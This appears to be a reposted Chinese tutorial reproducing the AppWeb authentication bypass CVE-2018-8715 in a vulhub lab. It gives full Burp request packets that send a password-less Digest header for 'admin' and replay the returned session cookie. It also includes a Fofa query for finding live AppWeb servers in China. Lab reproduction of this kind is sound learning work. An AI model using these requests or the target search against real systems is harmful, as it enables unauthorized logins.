实战AppWeb认证绕过漏洞(CVE-2018-8715)复现

admin 2022年4月20日09:17:32评论125 views字数 1814阅读6分2秒阅读模式

    最近可能会更新一些关于漏洞复现的文章,因为最近没事在找一些漏洞来复现,有新的有旧的,新手想要学习就可以看看我这里的复现文章,我文章中尽量写的从新手方面出发,同时文章中不涉及的我会给出链接让大家去学习。

       ok,正文开始

    

受影响版本:7.0.3之前的版本

 

Fofa语句搜索:(注:fofa搜索可以快速让你在网上找到你想要的网站,百度fofa即可访问)

title="Appweb" && country="CN"

//没找到更好的,暂时凑合用


正文:

首先是运行靶场,这里使用的是vulhub靶场,启动的目录是./appweb/CVE-2018-8715

首先我们先cd到启动目录下然后:

启动命令:docker-compose up -d

关于vulhub靶场安装的方式可参考官网

https://vulhub.org/#/docs/

启动环境之后我们直接访问

http://192.168.0.110:8080/  //这里替换成你自己的靶机IP地址即可


利用这个漏洞我们首先要先知道一个用户名才行,靶场中的是admin

我们打开burp进行拦截,不需要输入密码,只输入用户名我们拦截(注:关于burp的基本使用,大家可以到csdn上搜索burp基本用法即可

实战AppWeb认证绕过漏洞(CVE-2018-8715)复现

实战AppWeb认证绕过漏洞(CVE-2018-8715)复现

拦截到数据之后,然后我们按ctrl+r发送到重发器,重发器它的作用就是可以将抓到的数据反复发送得到回显,不需要重新抓包再修改不同的数据。

实战AppWeb认证绕过漏洞(CVE-2018-8715)复现

这个时候将左边的全部替换为下面的请求包

GET / HTTP/1.1 Host: example.com

Accept-Encoding: gzip, deflate Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Authorization: Digest username=admin

注:看图片中的格式,word中复制出的格式可能会有错,同时使用谷歌浏览器实验的话会有错,不太清楚原因,建议使用firefox

实战AppWeb认证绕过漏洞(CVE-2018-8715)复现

然后我们点击发送之后右边就会出现一个session,我们复制出来

-http-session-=8::http.session::146407b75b2ead88014f60850246044f

然后我们进行下一步,利用我们获取到的cookie,将这个复制出来的放到下面的数据包中红色地方

 

--**以下为数据包部分**--

POST / HTTP/1.1

Host: 192.168.0.110:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Authorization: Digest username=admin

 -http-session-=8::http.session::146407b75b2ead88014f60850246044f

Upgrade-Insecure-Requests: 1

Content-Length: 18

 

username=admin

--**以上为数据包部分**--

将上面代码直接放到proxy中,将红色的地方改成你自己的IP和自己拿到的session

实战AppWeb认证绕过漏洞(CVE-2018-8715)复现

然后我们直接发送,这里不需要到重发器中,直接点击forword即可了。

实战AppWeb认证绕过漏洞(CVE-2018-8715)复现


完成了,我们这里成功登录了进去,复现完成

 

参考文章:

https://blog.csdn.net/YouthBelief/article/details/121072956

https://vulhub.org/#/environments/appweb/CVE-2018-8715/


原文始发于微信公众号(白安全组):实战AppWeb认证绕过漏洞(CVE-2018-8715)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月20日09:17:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战AppWeb认证绕过漏洞(CVE-2018-8715)复现http://cn-sec.com/archives/926374.html

发表评论

匿名网友 填写信息